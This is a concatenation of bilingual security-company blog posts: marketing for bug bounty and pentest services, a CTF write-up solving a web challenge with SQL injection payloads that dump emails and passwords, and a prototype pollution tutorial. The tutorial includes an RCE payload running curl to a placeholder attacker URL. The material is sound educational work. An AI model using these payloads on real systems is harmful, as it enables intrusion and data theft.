Managing and addressing vulnerabilities effectively requires a clear and structured reporting system. Implementing a Vulnerability Disclosure Program (VDP) ensures that vulnerabilities are reported in a secure and organized manner. This systematic approach helps streamline the process of addressing security issues and enhances your overall vulnerability management. By adopting a VDP, you can turn the challenge of handling vulnerability reports into an opportunity to strengthen your security practices and build trust with your stakeholders.

&nbsp;

<h2>Invest in Continuous Security Review</h2>

Cybersecurity is an ongoing process, not a one-time effort. Investing in continuous security review ensures that your organization remains vigilant against emerging threats. By combining automated tools with expert manual analysis, you can identify and mitigate vulnerabilities on an ongoing basis. This continuous review process not only helps in maintaining compliance but also enhances your security practices. Turning the challenge of maintaining up-to-date security into an opportunity for ongoing improvement helps your organization stay ahead of evolving threats.

&nbsp;

<h2>Foster a Security-First Culture</h2>

Building a strong cybersecurity culture within your organization is essential for turning challenges into growth opportunities. Encourage employees to adopt security best practices, stay informed about potential threats, and actively participate in security initiatives. A security-first culture not only enhances your organization&rsquo;s overall security posture but also empowers your team to view cybersecurity challenges as opportunities for learning and development.

&nbsp;

<h2>How Trustline Can Help</h2>

At Trustline, we understand that transforming cybersecurity challenges into growth opportunities requires the right tools and strategies. Our suite of solutions is designed to support you in this endeavour:

<ul>
	<li>Trustline Assessment: Our Pentest as a Service (PTaaS) provides a comprehensive approach to identifying vulnerabilities through simulated cyberattacks. This proactive testing helps you stay ahead of potential threats and strengthens your security posture.</li>
	<li>Trustline Bounty: Our Bug Bounty Program connects you with skilled ethical hackers who can uncover hidden vulnerabilities in your systems. By leveraging their expertise, you can gain valuable insights and continuously enhance your security measures.</li>
	<li>Trustline Disclosure: Our Vulnerability Disclosure Program (VDP) offers a structured and secure method for reporting and managing vulnerabilities. This ensures that issues are addressed efficiently and helps build trust with your stakeholders.</li>
	<li>Trustline Review: Our continuous, cloud-based service combines automated tools with expert analysis to identify and mitigate vulnerabilities in your software code. This ongoing review process ensures compliance and enhances your security practices.</li>
</ul>

By partnering with Trustline, you can turn your cybersecurity challenges into opportunities for growth and innovation. Explore our solutions today and discover how we can help you strengthen your cybersecurity strategy and drive success.

If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;and <a href="mailto:info@trustline.sa">contact us</a> to use the cybersecurity Challenges that you might face into Powerful Growth Opportunities for your company

في عصرنا الرقمي الحالي، تعتبر التحديات السيبرانية جزءاً لا مفر منه. ومع ذلك، يمكن أن تكون هذه التحديات أكثر من مجرد عقبات يمكن أن تكون فرصاً حقيقية للنمو والتحسين. من خلال تبني نهج استباقي واستراتيجي، يمكن للمنظمات تحويل هذه التحديات إلى محركات ودافع قوي للابتكار والمرونة. إليك كيف يمكنك تحويل تحدياتك السيبرانية إلى فرص قيمة للنمو.

&nbsp;

<h2>اعتماد استراتيجيتك الأمنية استباقية</h2>

أول خطوة لتحويل التحديات السيبرانية إلى فرص للنمو هي تبني عقلية استباقية في الأمن السيبراني. بدلاً من الانتظار حتى حدوث هجوم، يجب على المنظمات توقع التهديدات المحتملة ومعالجة الثغرات قبل أن يتم استغلالها. يعزز هذا النهج الاستباقي من دفاعاتك ويجعل منظمتك رائدة في مجال المرونة السيبرانية

ولقد تكلمنا عن هذا النهج بشكل أدق في إحدى مقالاتنا السابقة <a href="https://www.trustline.sa/ar/blog/Preparing-for-the-Next-Cyber-Attack-How-a-Proactive-Approach-Can-Protect-Your-Brand">هنا</a>.

&nbsp;

<h2>استفد من خبرات الهاكرز في اختباراتك الأمنية</h2>

الهاكرز الأخلاقيين، <s>الذين</s> يقومون بمحاكاة الهجمات السيبرانية ، هم العنصر الأساسي في أي استراتيجية أمنية قوية. من خلال محاكاة الهجمات، يمكن لهؤلاء الهاكرز تحديد الثغرات التي قد لا تكون واضحة من خلال الطرق التقليدية. اعتماد اختبار الهاكرز&nbsp;يمكن أن يوفر لك رؤى قيمة حول وضعك الأمني ويساعدك هذا الاختبار من معالجة نقاط الضعف لديك قبل أن تتحول إلى مشكلات كبيرة. هذه الطريقة تحول تحديات تحديد الثغرات إلى فرص للتحسين المستمر.

&nbsp;

<h2>بناء نظام منظم للإبلاغ عن الثغرات</h2>

إدارة الثغرات بشكل فعال تتطلب نظاماً واضحاً ومنظماً للإبلاغ. بناء برنامج الإبلاغ عن الثغرات يضمن أن يتم الإبلاغ عن الثغرات بطريقة آمنة ومنظمة. يساعد هذا النهج المنظم في تسريع معالجة المشكلات الأمنية ويعزز من إدارة الثغرات العامة لديك. من خلال اعتماد برنامج الإبلاغ، يمكنك تحويل تحديات إدارة تقارير الثغرات إلى فرصة لتحسين ممارسات الأمان وبناء الثقة مع جمهورك المستهدف.

&nbsp;

<h2>الاستثمار في عملية مراجعة الأمان المستمرة</h2>

الأمن السيبراني هو عملية مستمرة، وليس مجهودًا لمرة واحدة. الاستثمار في مراجعة الأمان المستمرة يضمن أن تظل منظمتك على دراية بالتهديدات الجديدة بشكل مستمر. من خلال دمج الأدوات الآلية مع التحليل اليدوي يمكنك تحديد وتخفيف الثغرات بشكل مستمر. هذه العملية المستمرة تساعد في الحفاظ على الامتثال وتعزيز ممارسات الأمان لديك. تحويل تحدي الحفاظ على أمان محدث إلى فرصة للتحسين المستمر يساعد منظمتك في البقاء متقدمة على التهديدات المتطورة.

&nbsp;

<h2>تعزيز ثقافة الأمن السيبراني</h2>

بناء ثقافة قوية للأمن السيبراني داخل منظمتك أمر أساسي لتحويل التحديات إلى فرص نمو، كيف؟

<ul>
	<li>شجع الموظفين على تبني أفضل ممارسات الأمان.</li>
	<li>البقاء على اطلاع على التهديدات المحتملة.</li>
	<li>المشاركة الفعالة في المبادرات الأمنية.</li>
</ul>

ثقافة الأمن السيبراني لا تعزز فقط وضعك الأمني العام ولكن أيضاً تمكّن فريقك من رؤية التحديات السيبرانية كفرص للتعلم والتطور.

&nbsp;

<h2>كيف يمكن أن تساعدك ترست لاين</h2>

في ترست لاين، ندرك أن تحويل التحديات السيبرانية إلى فرص للنمو يتطلب الأدوات والاستراتيجيات الصحيحة. حلولنا مصممة لدعمك في هذا المجال.

<ul>
	<li>ترست لاين ريفيو: خدمة مراجعة الأكواد البرمجية، هذه الخدمة تجمع بين الأدوات الآلية والتحليل اليدوي من قبل الخبراء لتحديد ومعالجة الثغرات الأمنية في مصدر الأكواد البرمجية لأصولك الرقمية. هذه الخدمة لا تعزز فقط ممارسات الأمان الخاصة بك، ولكنها تضمن أيضًا الامتثال للمعايير التنظيمية. مع ترست لاين ريفيو، يمكنك تحديد نطاق ومواعيد وإدارة عملية مراجعة مصدر الأكواد البرمجية الخاص بك بكفاءة، بالتعاون مع شبكتنا من المهندسين ذوي الكفاءات العالية الذين يفحصون أكوادك البرمجية بعناية للبحث عن الثغرات الأمنية.</li>
	<li>ترست لاين ديسكلوجر: هو برنامج الإفصاح عن الثغرات، الذي يوفر طريقة منظمة للهاكرز للإبلاغ عن الثغرات الي تتعلق بعلامتك التجارية بطريقة آمنة وواضحة. من خلال تنفيذ هذا البرنامج، يمكنك إثبات التزامك بالأمن السيبراني، .</li>
	<li>ترست لاين باونتي: هو برنامج مكافآت الثغرات الأمنية الخاص بنا، الذي يوفر حوافز مالية للهاكرز الذين ينجحون في تحديد والإبلاغ عن الثغرات الأمنية. يتيح هذا البرنامج للشركات الاستفادة من خبرات الهاكرز والباحثين في مجال الأمن السيبراني، الذين يقومون بشكل مستمر باختبار أنظمتك للعثور على العيوب التي قد لا تكتشفها التقنيات الأمنية التقليدية. من خلال الاختبار والتحليل المستمر للأمان بدعم من رؤى الهاكرز، يمكنك تعزيز دفاعات نظامك والبقاء متقدماً على التهديدات المتجددة.</li>
	<li>ترست لاين أسسمنت: يقدم ترست لاين أسسمنت اختبار الاختراق كخدمة، وهو نهج قائم على نموذج البرمجيات كخدمة لإدارة وتنسيق أنشطة اختبارات الاختراق. تشمل هذه الاختبارات محاكاة للهجمات السيبرانية التي يتم إجراؤها بواسطة محترفين في مجال الأمن السيبراني لتحديد وتقييم خطورة الثغرات في الأصول الرقمية لمنظمتك. نوفر حلول للعملاء من خلال اختيار مواعيد وإدارة اختبارات الاختراق الخاصة بهم، بالإضافة إلى ربطهم مع مختبرين أختراق ذوي كفاءات عالية. هذه الأنشطة المنهجية المحددة بوقت معين تضمن اختبار أنظمتك بشكل شامل وتعزيزها ضد الهجمات المحتملة.</li>
</ul>

&nbsp;

من خلال الشراكة مع ترست لاين، يمكنك تحويل تحديات الأمن السيبراني إلى فرص للنمو والابتكار. استكشف حلولنا اليوم واكتشف كيف يمكننا مساعدتك في تعزيز استراتيجيتك الأمنية ودفعك للنجاح.

&nbsp;

تابعونا على منصات التواصل الاجتماعي&nbsp;<a href="https://twitter.com/TrustlineSec">تويتر</a>، <a href="https://www.linkedin.com/company/trustlinesec/">لينكد ان</a>، لمعرفة آخر التحديثات و&nbsp;<a href="mailto:info@trustline.sa">تواصل معنا</a> أستخدم هذه التحديات السيبرانية التي قد تواجهك الى فرص للنمو لمنشأتك

Turning Cybersecurity Challenges into Powerful Growth Opportunities

حول تحديات منظمتك السيبرانية إلى فرص قوية للنمو

Turning-Cybersecurity-Challenges-into-Powerful-Growth-Opportunities

In today’s digital age, cybersecurity challenges are a given. Yet, these challenges can be more than just obstacles—they can be opportunities for growth and improvement. By adopting a proactive and strategic approach, organizations can transform these hurdles into powerful drivers of innovation and resilience. Here’s how you can turn your cybersecurity challenges into valuable opportunities for growth.

في عصرنا الرقمي الحالي، تعتبر التحديات السيبرانية جزءاً لا مفر منه. ومع ذلك، يمكن أن تكون هذه التحديات أكثر من مجرد عقبات يمكن أن تكون فرصاً حقيقية للنمو والتحسين. من خلال تبني نهج استباقي واستراتيجي، يمكن للمنظمات تحويل هذه التحديات إلى محركات ودافع قوي للابتكار والمرونة. إليك كيف يمكنك تحويل تحدياتك السيبرانية إلى فرص قيمة للنمو.

<h2>Challenge overview:</h2>

<ul>
	<li>DataBreach is a medium-level challenge with the description, &quot; Data breaches can disrupt your life and privacy. It&#39;s time to take charge and find out if your personal accounts have been compromised.&quot;</li>
	<li>It is a web-based challenge that requires specific skills, including a solid understanding of the OWASP Top 10.</li>
	<li>The challenge simulates a Data Breach checker using a search engine</li>
</ul>

<a href="https://i.imgur.com/qOZtAsR.png"><img alt="" src="/media/blog/2024/02/04/1.png" style="height:204px; width:733px" /></a>

&nbsp;

<h2>Technical approach:</h2>

<ul>
	<li>I examined the source page to search for any JavaScript or comments, but it consisted solely of clear HTML/CSS with no JavaScript scripts included.</li>
	<li>I attempted to manually inspect for the presence of the OWASP Top 10</li>
	<li>I entered a query that triggered the SQL injection vulnerability.</li>
	<li>I used the simple &ldquo;1&rsquo; OR 1=1 --&rdquo; SQL Injection query which translates to &ldquo; SELECT email FROM users WHERE email= &lsquo;1&rsquo; OR 1=1 --&rsquo; &rdquo;</li>
</ul>

Which is going to evaluate to True and thus is going to get all emails

<img alt="" src="/media/blog/2024/02/04/chrome_hhnbzgnyd4.png" style="height:355px; width:716px" />

Now, with a foothold, let&rsquo;s try to read the table configuration using the query &ldquo; 1&#39; UNION SELECT sql FROM sqlite_schema-- &rdquo;. This reutrns

<img alt="" src="/media/blog/2024/02/04/chrome_9yhbfmvzmh.png" style="height:233px; width:723px" />

&ldquo;CREATE TABLE users (email TEXT PRIMARY KEY, password TEXT)&rdquo;. Moving forward, let&rsquo;s try to retrieve the password using the query &ldquo; 1&#39; or 1=1 UNION SELECT password FROM users -- &rdquo; It returns a list of all users&rsquo;s passwords

<img alt="" src="/media/blog/2024/02/04/chrome_5f8ludumrh.png" style="height:387px; width:726px" />

After a brief investigation, I found a base64 encoded string &ldquo;VFJVU1RMSU5FeyFfSEB2M18zZWVuX1Amd24zZH0K&rdquo; I quickly recognized it from my past experiences.

<img alt="" src="/media/blog/2024/02/04/chrome_jebxqfjhj1.png" style="height:565px; width:598px" />

I turned to CyberChef, a reliable platform for decoding/decrypting ciphers, to decode the base64-encoded string

&nbsp;

<h2>Conclusion:</h2>

<ul>
	<li>DataBreach challenge solved via SQL injection. Retrieved emails, table info, and passwords. Decoded base64 string for insights.</li>
	<li>I struggled a bit to find the table configuration during the SQL injection process in DataBreach.</li>
	<li>I referred to the SQLite Schema Table at <a href="https://sqlite.org/schematab.html">https://sqlite.org/schematab.html</a>.</li>
	<li>Solving challenges improved practical skills in OWASP Top 10 and SQL injection, highlighted cryptographic decoding.</li>
</ul>

&nbsp;

<h2 dir="rtl">نظرة عامة على التحدي:</h2>

●&nbsp;التسريب البياني هو تحدي متوسط ​​الصعوبة مع الوصف &quot;يمكن أن يعطل التسريب البياني حياتك وخصوصيتك. حان الوقت لتحمل المسؤولية ومعرفة ما إذا تم اختراق حساباتك الشخصية أم لا&quot;. 

●&nbsp;إنه تحدي قائم على الويب يتطلب مهارات محددة ، بما في ذلك فهم قوي لأهم عشرة مشاكل في OWASP. 

●&nbsp;يحاكي التحدي أداة فحص تسرب البيانات باستخدام محرك بحث. 

<a href="https://i.imgur.com/qOZtAsR.png"><img alt="" src="/media/blog/2024/02/04/1.png" style="height:204px; width:733px" /></a>

&nbsp;

<h2 dir="rtl">النهج التقني:</h2>

●&nbsp;قمت بفحص صفحة المصدر للبحث عن أي JavaScript أو تعليقات ، لكنها كانت تحتوي فقط على HTML / CSS واضحة دون أي سكربتات JavaScript. 

●&nbsp;حاولت فحصي يدويًا للبحث عن وجود أهم عشرة مشاكل في OWASP. 

●&nbsp;أدخلت استعلامًا يؤدي إلى ثغرة حقن SQL. 

●&nbsp;استخدمت استعلام حقن SQL البسيط &quot;1 &#39;OR 1 = 1 --&quot; الذي يترجم إلى &quot;SELECT email FROM users WHERE email =&#39;1&#39; OR 1 = 1 --&#39;&quot; 

والذي سيقيم صحة الشرط وبالتالي سيحصل على جميع الرسائل البريدية.

<img alt="" src="/media/blog/2024/02/04/chrome_hhnbzgnyd4.png" style="height:355px; width:716px" />

●&nbsp;يعيد هذا &quot;CREATE TABLE users (email TEXT PRIMARY KEY، password TEXT)&quot;. متقدمين ، دعونا نحاول استرجاع كلمة المرور باستخدام الاستعلام &quot;1 &#39;or 1 = 1 UNION SELECT password FROM users--&quot;.

<img alt="" src="/media/blog/2024/02/04/chrome_5f8ludumrh.png" style="height:387px; width:726px" />

يُعيد قائمة بكلمات المرور لجميع المستخدمين. بعد التحقيق السريع ، وجدت سلسلة مشفرة بنظام base64 &quot;VFJVU1RMSU5FeyFfSEB2M18zZWVuX1Amd24zZH0K&quot;.

<img alt="" src="/media/blog/2024/02/04/chrome_jebxqfjhj1.png" style="height:565px; width:598px" />

سرعان ما اعترفت بها من تجاربي السابقة. لجأت إلى CyberChef ، وهي منصة موثوقة لفك تشفير / فك التشفير لترميز السلاسل بنظام base64

&nbsp;

<h2 dir="rtl">الختام:</h2>

● تم حل تحدي التسريب البياني عن طريق حقن SQL. تم الحصول على رسائل البريد الإلكتروني ومعلومات الجدول وكلمات المرور. فك شفرة سلسلة base64 للحصول على رؤى.

● واجهت بعض الصعوبات في العثور على تكوين الجدول خلال عملية حقن SQL في التسريب البياني.

● رجعت إلى جدول مخطط SQLite على <a href="https://sqlite.org/schematab.html" target="_new">https://sqlite.org/schematab.html</a>.

● حل التحديات قوى المهارات العملية في أهم عشرة مشاكل في OWASP وحقن SQL ، وأبرز فك التشفير التشفيري.

&nbsp;

Data-Breach-Challenge

The DataBreach challenge, of medium difficulty, simulates a data breach checker tool using a search engine and requires specific skills related to the OWASP Top 10. The challenge was solved by exploiting SQL injection vulnerabilities, leading to the retrieval of emails and passwords. Additionally, a base64-encoded string was decoded for further insights into the scenario.

تمثل التسريبات البيانية تحديًا متوسط ​​الصعوبة يتطلب مهارات محددة، وهو يحاكي أداة فحص تسرب البيانات باستخدام محرك بحث ويستند إلى مفهوم عشرة مشاكل رئيسية في OWASP. تم حل التحدي عبر استغلال ثغرات حقن SQL، مما أدى إلى الحصول على رسائل البريد الإلكتروني وكلمات المرور، وفك تشفير سلسلة base64 للحصول على رؤى.

DataBreach Challenge Writeup

حل تحدي DataBreach

As security technologies evolve, the Prototype Pollution vulnerability emerges as one of the new challenges facing developers and security experts. This vulnerability, which allows attackers to manipulate JavaScript objects, requires constant awareness and the application of sound coding practices to effectively mitigate it.

&nbsp;

<h2>But first, let&rsquo;s understand: What is an object in JavaScript?</h2>

<img alt="" src="/media/blog/2024/09/25/scrn1.jpeg" style="height:788px; width:1400px" />

An object is essentially a collection of &quot;keys&quot; and &quot;values&quot; pairs, separated by a comma.

Values can contain almost any type of data, such as numbers, text, functions, and even other objects. It&#39;s worth noting that keys in objects are often referred to as &quot;properties,&quot; representing the data or functions associated with the object.

You can access object properties using two methods:

<ul>
	<li>Dot notation</li>
	<li>bracket notation.</li>
</ul>

Both can be used to access the same properties, although there are some differences, which we won&rsquo;t dive into now.

As mentioned earlier, objects can contain functions as well:

<img alt="" src="/media/blog/2024/09/25/scrn2.png" style="height:748px; width:986px" />

&nbsp;

<h2>What is a prototype in JavaScript?</h2>

In JavaScript, every object is linked to another type of object known as a prototype.

By default, JavaScript automatically assigns built-in prototypes to new objects.

To clarify this further, here are some examples of prototypes:

<ul>
	<li><code>Array.prototype</code>: The prototype that contains built-in functions and properties for arrays.</li>
	<li><code>Function.prototype</code>: Contains the basic functions for all functions.</li>
	<li><code>Object.prototype</code>: The top-level prototype in the chain, containing the general properties for all objects.</li>
</ul>

These prototypes provide a set of ready-to-use functions and properties for objects.

&nbsp;

<h2>How does object inheritance work in JavaScript?</h2>

When we try to access a property of an object, the search doesn&rsquo;t stop at the object itself. The property is also searched for in the object&rsquo;s prototype.

<img alt="" src="/media/blog/2024/09/25/scrn3.png" style="height:471px; width:838px" />

&nbsp;

<h2>Prototype chain:</h2>

The prototype chain refers to the hierarchical sequence of prototypes in JavaScript.

It&rsquo;s important to understand that the prototype itself is an object, meaning it also has its own prototype. This sequence continues until we reach the base prototype, which is <code>Object.prototype</code>, whose prototype is <code>null</code>.

In other words, <code>Object.prototype</code> is the end of the prototype chain, with no higher prototype. All objects in JavaScript are ultimately linked to this prototype, providing a common foundation for properties and functions. Although this concept may seem confusing at first, it becomes clearer when you realize that everything in JavaScript is essentially an object.

&nbsp;

<h2>Accessing an object&rsquo;s prototype:</h2>

Every object in JavaScript has a <code>__proto__</code> property, which allows you to access its prototype.

<img alt="" src="/media/blog/2024/09/25/scrn4.png" style="height:406px; width:1234px" />

&nbsp;

<h2>Prototype Pollution:</h2>

This vulnerability occurs when an object&rsquo;s prototype is altered, leading to unwanted effects on all objects linked to that prototype. For example, if an <code>isAdmin</code> property is added to an object&rsquo;s prototype with a value of <code>true</code>, all JavaScript objects will inherit this property. This presents the vulnerability, as an attacker could exploit this modification to elevate their privileges to admin rights in an unauthorized manner.

It&rsquo;s worth noting that if this property is pre-defined in the object, you cannot modify it, as shown in the image.

<img alt="" src="/media/blog/2024/09/25/scrn-5.png" style="height:1128px; width:848px" />

We can also use <code>constructor.prototype</code> if <code>__proto__</code> has been blocked by developers, achieving the same result:

<img alt="" src="/media/blog/2024/09/25/scrn6.png" style="height:368px; width:926px" />

&nbsp;

The vulnerability is categorized into two types:

<ol>
	<li>Server-side Prototype Pollution: Occurs when the vulnerability is exploited on the server, affecting JavaScript objects in the server environment, leading to more significant security risks.</li>
	<li>Reflected Prototype Pollution:In the first image, the API&rsquo;s normal response is shown. In the second image, after adding the <code>testing</code> property, we observe the reflection of this property in the response, indicating prototype pollution:</li>
</ol>

&nbsp;

<img alt="" src="/media/blog/2024/09/25/scrn7.png" style="height:767px; width:1427px" />

<img alt="" src="/media/blog/2024/09/25/scrn8.png" style="height:763px; width:1425px" />

<h2>Non-Reflected Prototype Pollution:</h2>

There are various techniques, and we&rsquo;ll mention just one&mdash;<code>json spaces override</code>, a feature in the Express framework that allows you to set the number of spaces in the response. We need to select the Raw tab in BurpSuite to notice the change.

In the first image, the API&rsquo;s normal response is shown, while in the second, we can see the difference in the response structure, where the number of spaces has increased, signaling the presence of the vulnerability.

We can also simply change the value of <code>isAdmin</code> to <code>true</code> using the same method, as shown in the last image.

<img alt="" src="/media/blog/2024/09/25/scrn9.png" style="height:760px; width:1431px" />

<img alt="" src="/media/blog/2024/09/25/scrn10.png" style="height:767px; width:1434px" />

<img alt="" src="/media/blog/2024/09/25/scrn11.png" style="height:758px; width:1422px" />

<h2>The Potential for Escalation to RCE (Remote Code Execution):</h2>

When the vulnerability exists on the server-side, there is potential for escalation to RCE. There are pre-tested techniques that eliminate the need to search for exploitable properties, most notably involving the <code>child_process</code> library, which contains functions like <code>spawn()</code>, <code>fork()</code>, and <code>execSync()</code>.

For example, let&rsquo;s see how the <code>fork()</code> function works:

<img alt="" src="/media/blog/2024/09/25/scrn12.png" />

&nbsp;

We can see clearly that it accepts an <code>options</code> object as an argument, which includes the <code>execArgv</code> property&mdash;a string array passed as arguments to the Node.js program (the program that runs JavaScript files) when executing <code>child.js</code>. Leaving this property <code>undefined</code> opens the door for vulnerability escalation.

To clarify further, we&rsquo;ll examine the <code>fork()</code> function&rsquo;s code on GitHub:

<img alt="" src="/media/blog/2024/09/25/scrn13.png" style="height:861px; width:1337px" />

&nbsp;

We can observe the line of code that can be leveraged to escalate the vulnerability:

execArgv = options.execArgv || process.execArgv;

This means <code>execArgv</code> is assigned to <code>options.execArgv</code> if it exists, or to <code>process.execArgv</code> if <code>options.execArgv</code> is undefined. This behaviour allows for exploitation, as we can manipulate the values in <code>execArgv</code>.

The values we will use in <code>execArgv</code> are:

--eval=require(&#39;child_process&#39;).execSync(&#39;curl &lt;attacker url&gt;&#39;)

Hopefully, this is clear. Now let&rsquo;s apply this in practice:

<img alt="" src="/media/blog/2024/09/25/scrn14.png" style="height:751px; width:1425px" />

Here is the request we received:

<img alt="" src="/media/blog/2024/09/25/scrn15.png" style="height:588px; width:1422px" />

Of course, you can execute any system commands you want, but for this example, we just used <code>curl</code>.

<h2>Client-side Prototype Pollution:</h2>

Occurs when the vulnerability is exploited in the browser environment, affecting JavaScript objects in the user interface.

Client-side prototype pollution is considered less dangerous than the server-side type, as it can lead to XSS (Cross-Site Scripting) vulnerabilities, which, while serious, are not as critical as RCE.

For example, we have this website:

<img alt="" src="/media/blog/2024/09/25/scrn16.png" style="height:967px; width:1559px" />

If we inject the query inside the URL and visit the browser&rsquo;s DevTools, we can create an object (<code>a</code>) and find that the vulnerability has indeed affected all objects.

<img alt="" src="/media/blog/2024/09/25/scrn17.png" style="height:489px; width:1547px" />

Now, we need to search for a &ldquo;gadget,&rdquo; which is a property that can be exploited. An example of a gadget is the <code>execArgv</code> property mentioned earlier in the server-side vulnerability.

When searching through the JavaScript files available on the site, we can observe that the <code>transport_url</code> property can be used, as it will be placed inside the <code>src</code> attribute of a <code>&lt;script&gt;</code>, as shown in the image:

<img alt="" src="/media/blog/2024/09/25/scrn18.png" style="height:628px; width:1006px" />

<img alt="" src="/media/blog/2024/09/25/scrn19.png" style="height:330px; width:864px" />

&nbsp;

Thus, we can inject an XSS exploit inside it, combining it with prototype pollution. Finally, here&rsquo;s the exploit:

<img alt="" src="/media/blog/2024/09/25/scrn20.png" style="height:811px; width:1572px" />

<img alt="" src="/media/blog/2024/09/25/scrn21.png" style="height:330px; width:1172px" />

There is a tool from Portswigger called DOM Invader that automates this process, and I recommend checking it out.

<h2>Conclusion</h2>

Prototype pollution poses a significant challenge for developers and security experts in the JavaScript world. As applications increasingly rely on JavaScript, the need for effective protection against these vulnerabilities becomes essential. Developers must adopt secure coding practices and implement strategies for early detection and patching of vulnerabilities.

To prevent prototype object alterations and reduce the risk of prototype pollution vulnerabilities, using the <code>Object.freeze()</code> method is an effective strategy.

<img alt="" src="/media/blog/2024/09/25/scrn22.png" style="height:406px; width:942px" />

Using <code>Object.freeze()</code> ensures that the properties of a prototype object cannot be modified or new properties added, helping to enhance application security.

By gaining a solid understanding of how prototypes work and staying aware of potential risks, developers can minimize the impact of prototype pollution and ensure the security of their applications.

<h2>Sources:</h2>

<ul>
	<li><a href="https://portswigger.net/web-security/all-labs#prototype-pollution">https://portswigger.net/web-security/all-labs#prototype-pollution</a></li>
	<li><a href="https://portswigger.net/web-security/prototype-pollution">https://portswigger.net/web-security/prototype-pollution</a></li>
</ul>

Prototype-pollution-Vulnerability

As security technologies evolve, the Prototype Pollution vulnerability emerges as one of the new challenges facing developers and security experts. This vulnerability, which allows attackers to manipulate JavaScript objects, requires constant awareness and the application of sound coding practices to effectively mitigate it.

في الوقت الذي تتطور فيه تقنيات الأمان، تبرز ثغرةPrototype Pollution  كأحد التحديات الجديدة التي تواجه المطورين وخبراء الأمان. هذه الثغرة، التي تتيح للمهاجمين التلاعب بكائنات JavaScript ، تتطلب وعيًا دائمًا وتطبيق ممارسات برمجية سليمة لإغلاقها بشكل فعال.

Prototype pollution Vulnerability

ثغرة ال Prototype pollution

Bug bounties are gaining popularity, but with that comes a slew of misconceptions. Let&rsquo;s clear up some of these myths with insights from our team at Trustline.

&nbsp;

<h2>Myth #1: Bug Bounty Programs Must Be Public</h2>

Public bug bounty programs do showcase your product&rsquo;s security, inviting anyone to find vulnerabilities. However, the reality is most bug bounty programs are private. At Trustline, 80% of programs are private and by invitation only, selecting participants based on criteria like experience, skills, and availability.

Organizations often start with a private program to refine their processes before going public. Public programs can attract more security researchers and vulnerabilities, but reports can still be kept private or redacted. Trustline supports various disclosure methods to acknowledge the efforts of security researchers.

&nbsp;

<h2>Myth #2: Bug Bounties Need to Run Continuously All Year</h2>

This is not true. While some run continuous programs, many opt for time-limited Trustline Challenges, an alternative to traditional pentests. These involve a defined scope and a fixed number of hackers over a set period. They can fulfil compliance requirements and offer a more efficient use of skills. After the challenge, vulnerabilities can be fixed and retested with community help, leading to improved product security and a more secure SDLC.

&nbsp;

<h2>Myth #3: You Must Award Bounties to Work with Hackers</h2>

A Vulnerability Disclosure Program (VDP) allows for receiving vulnerabilities without financial incentives. VDPs provide a public channel for reporting digital issues, avoiding surprises from unexpected disclosures. Governments and companies, including Khotta, Tawasul, Jahezو use Trustline&rsquo;s platform for their VDPs.

While there is a competitive bounty market with varying rewards, the primary goal is to enhance security. Trustline has created opportunities for hackers to earn significant rewards, while simultaneously improving internet security.

&nbsp;

<h2>Myth #4: Bug Bounties Don&rsquo;t Promote Developer-Hacker Communication</h2>

Effective communication is crucial for fixing bugs, and developers benefit from direct interaction with hackers. Trustline&rsquo;s platform facilitates this by allowing tagging, assigning vulnerabilities, and integrating with tools like Slack, Jira,. This streamlined communication helps organizations connect their development, security, and operations teams with external researchers, fostering a collaborative environment to enhance application security over time.

&nbsp;

<h2>Myth #5: Bug Bounty Programs Are Only for Large Companies</h2>

Bug bounty programs are not just for large companies. Organizations of any size can leverage these programs to boost their security. Smaller companies can benefit significantly by accessing global security expertise without needing a large in-house team. Trustline offers flexible solutions for all budgets, making advanced cybersecurity accessible to small and medium-sized businesses.

&nbsp;

By debunking these myths, we hope to encourage more organizations to consider bug bounty programs as a viable option for improving their security posture.

&nbsp;

<h2>How Trustline Can Help:</h2>

Trustline utilizes the community of hackers to help keep businesses safe by providing an all-in-one platform to perform continuous and comprehensive security testing. The platform takes a streamlined approach to finding and remediating bugs while supporting everything in a single dashboard.

Trustline is the first crowdsourced security platform in the region. If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;and <a href="mailto:info@trustline.sa">contact us</a> today to launch your first bug bounty program.

تشهد برامج مكافآت الثغرات الأمنية&nbsp; رواجًا متزايدًا، إلا أنها تصاحبها أيضًا مجموعة من المفاهيم والخرافات الخاطئة. دعونا نكشف عن زيف هذه الخرافات بالاستعانة بخبرة فريقنا في ترست لاين.

&nbsp;

<h2>الخرافة رقم 1: برامج مكافآت الثغرات الأمنية يجب أن تكون عامة</h2>

البرامج العامة&nbsp; تدعو الجميع للبحث عن الثغرات الأمنية. لكن الحقيقة أن معظم برامج المكافآت خاصة وتستند على الدعوات الموجهة. في ترست لاين، 80% من البرامج خاصة والمشاركين فيها يخضعون لمعايير معينة مثل الخبرات والمهارات والتوافر.

عادةً ما تبدأ المؤسسات ببرنامج خاص لصقل عملياتها قبل طرحه للجميع بشكل عام. البرامج العامة تجذب المزيد من الباحثين الأمنيين وتكشف عن المزيد من الثغرات الأمنية، لكن لا يزال بالإمكان الحفاظ على سرية التقارير. تدعم ترست لاين طرق إفشاء متنوعة تقديرًا لجهود الباحثين الأمنيين.

&nbsp;

<h2>الخرافة رقم 2: يجب تشغيل برامج مكافآت الثغرات الأمنية على مدار السنة</h2>

هذا غير صحيح. بينما تدير بعض الشركات برامج مستمرة، يختار العديد تحديات ترست لاين المحددة بوقت، وهي بديل لاختبارات الاختراق التقليدية . تتضمن هذه التحديات نطاقًا محددًا وعددًا ثابتًا من الباحثين الأمنيين الأخلاقيين خلال فترة زمنية محددة. تلبي هذه التحديات متطلبات الامتثال وتوفر استغلالاً أكثر كفاءة للمهارات. بعد التحدي، يمكن إصلاح الثغرات الأمنية وإعادة اختبارها بمساعدة المجتمع الأمني، ما يؤدي إلى تعزيز أمان المنتج ودورة حياة تطوير آمن (SDLC) أكثر أمانًا.

&nbsp;

<h2>الخرافة رقم 3: يجب تقديم مكافآت مالية للتعاون مع الباحثين الأمنيين</h2>

يتيح برنامج الإفصاح عن الثغرات الأمنية (VDP) استلام تقارير عن الثغرات الأمنية دون حوافز مالية. توفر برامج VDP قناة عامة للإبلاغ عن الثغرات الأمنية، مما يجنبك من المفاجآت الناتجة عن الكشف والإفصاح الغير متوقع. تستخدم حكومات وشركات، بما في ذلك Khotta, Tawasul, Jahez، منصة ترست لاين وبرامج VDP الخاصة بها.

